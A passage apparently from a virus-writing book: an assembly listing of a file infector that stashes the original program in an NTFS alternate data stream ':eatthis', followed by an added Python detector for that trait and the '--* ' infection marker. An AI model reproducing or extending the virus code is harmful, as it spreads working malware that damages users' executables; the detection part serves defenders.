Natural languages are poorly suited to describing computer algorithms: they are too ambiguous and full of contradictions.
Listing 22.1 shows the key fragment of the virus's source code, with comments. Technical details are omitted here; the full code is supplied on the companion CD-ROM of this book in the file named xcode.asm.
section '.code' code readable executable

start:
; Delete the temporary file.
PUSH shutdown
CALL [DeleteFile]

; Determine the name.
PUSH 1000
PUSH buf
PUSH 0
CALL [GetModuleFileName]

; Read the command line.
; The --* file name option - infect
CALL [GetCommandLine]
MOV EBP, EAX
XOR EBX, EBX
MOV ECX, 202A2D2Dh ; "--* " as a little-endian DWORD
rool:
CMP [EAX], ECX ; Is this "--*"?
JZ infect
INC EAX
CMP [EAX], EBX ; End of the command line?
JNZ rool

; Output the diagnostic message
; confirming the virus's presence in the file.
PUSH 0
PUSH aInfected
PUSH aHello
PUSH 0
CALL [MessageBox]

; Add the name of the NTFS stream to the file name.
MOV ESI, code_name
MOV EDI, buf
MOV ECX, 100 ; code_name_end - code_name
XOR EAX, EAX
REPNE SCASB
DEC EDI
REP MOVSB

; Start the NTFS stream for execution.
PUSH xxx
PUSH xxx
PUSH EAX
PUSH EAX
PUSH EAX
PUSH EAX
PUSH EAX
PUSH EAX
PUSH EBP
PUSH buf
CALL [CreateProcess]
JMP go2exit ; Exit the virus.

infect:
; Set eax to the first character of the target file
; (from now on, called the destination, or dst for short).
ADD EAX, 4
XCHG EAX, EBP
XOR EAX, EAX
INC EAX

; Check the dst for infection.
; Rename dst as shutdown
PUSH shutdown
PUSH EBP
CALL [RenameFile]

; Copy the main stream of dst into shutdown.
PUSH EAX
PUSH EBP
PUSH BUF
CALL [CopyFile]

; Add the NTFS stream name to the new name.
MOV ESI, EBP
MOV EDI, buf
copy_rool:
LODSB
STOSB
TEST AL, AL
JNZ copy_rool
MOV ESI, code_name
DEC EDI
copy_rool2:
LODSB
STOSB
TEST AL, AL
JNZ copy_rool2

; Copy shutdown into dst:eatthis.
PUSH EAX
PUSH buf
PUSH shutdown
CALL [CopyFile]

; Length of correction of the file to be infected

; Delete shutdown.
PUSH shutdown
CALL [DeleteFile]

; Output the diagnostic message
; confirming successful infection.
PUSH 0
PUSH aInfected
PUSH EBP
PUSH 0
CALL [MessageBox]

; Exit the virus.
go2exit:
PUSH 0
CALL [ExitProcess]

section '.data' data readable writeable

shutdown DB "shutdown", 0 ; Name of the temporary file
code_name DB ":eatthis", 0 ; Name of the stream, in which
code_name_end:             ; the main body will be stored

; Various text strings displayed by the virus
aInfected DB "infected",0
aHello DB "Hello, you are hacked!"

; Various buffers for auxiliary purposes
buf RB 1000
xxx RB 1000
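Two observable traits of the listing matter to a defender: the virus keeps the original program in an alternate data stream named ":eatthis" and launches it by passing a "file.exe:eatthis" path to CreateProcess, and it selects infection mode when its own command line carries the marker "--* " (the constant 202A2D2Dh in the listing is those four bytes, 2D 2D 2A 20, stored little-endian). The following Python is an added detection example, not code from the book or from xcode.asm: it extracts the stream name from a Windows path (handling the drive-letter colon, UNC paths, an explicit ":$DATA" suffix, and the unnamed main stream) and scans process-creation records for either trait. The field names Image and CommandLine follow Sysmon event ID 1; that log source and the sample records are assumptions constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Marker the listing's virus looks for on its own command line ("--* <target>")
# to switch from "run the hidden original program" to "infect the named file".
INFECT_MARKER = "--* "


def ads_stream_name(path: str) -> Optional[str]:
    """Return the alternate-data-stream name if `path` addresses one, else None.

    Handles the drive-letter colon (C:), UNC paths, an explicit ":$DATA" type
    suffix, and the unnamed main stream ("file::$DATA"), which is not alternate.
    """
    p = path.strip().strip('"')
    if re.match(r"^[A-Za-z]:", p):      # drop "C:" so its colon is not a stream separator
        p = p[2:]
    last = re.split(r"[\\/]", p)[-1]    # only the final path component may carry a stream
    if ":" not in last:
        return None
    name, _, rest = last.partition(":")
    stream = rest.partition(":")[0]     # strip an explicit ":$DATA" (or other type) suffix
    if not name or not stream:
        return None
    return stream


def suspicious_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag process-creation records whose image is an ADS, or whose command
    line carries the listing's infection marker.  Field names (Image,
    CommandLine) follow Sysmon event 1; this is an assumption about the source."""
    hits: List[Dict[str, str]] = []
    for ev in events:
        reasons = []
        stream = ads_stream_name(ev.get("Image", ""))
        if stream:
            reasons.append(f"image executed from NTFS stream ':{stream}'")
        if INFECT_MARKER in ev.get("CommandLine", ""):
            reasons.append("command line carries the '--* <file>' infection marker")
        if reasons:
            hits.append({"Image": ev.get("Image", ""), "reasons": "; ".join(reasons)})
    return hits


# Constructed sample records (not real telemetry). The last one shows that
# merely reading a stream with 'type' is not execution from one and stays clean.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Users\alice\report.exe:eatthis",
     "CommandLine": r"C:\Users\alice\report.exe:eatthis"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
    {"Image": r"C:\Users\bob\tool.exe",
     "CommandLine": r"tool.exe --* C:\Users\bob\target.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c type C:\a\doc.txt:Zone.Identifier"},
]


if __name__ == "__main__":
    for hit in suspicious_events(SAMPLE_EVENTS):
        print(f"{hit['Image']}: {hit['reasons']}")
```

The check is deliberately on the Image path rather than on any colon in the command line: Windows writes benign streams such as Zone.Identifier to downloaded files, so the presence of a stream name is routine, whereas a process whose image path names a stream is the anomaly the listing produces.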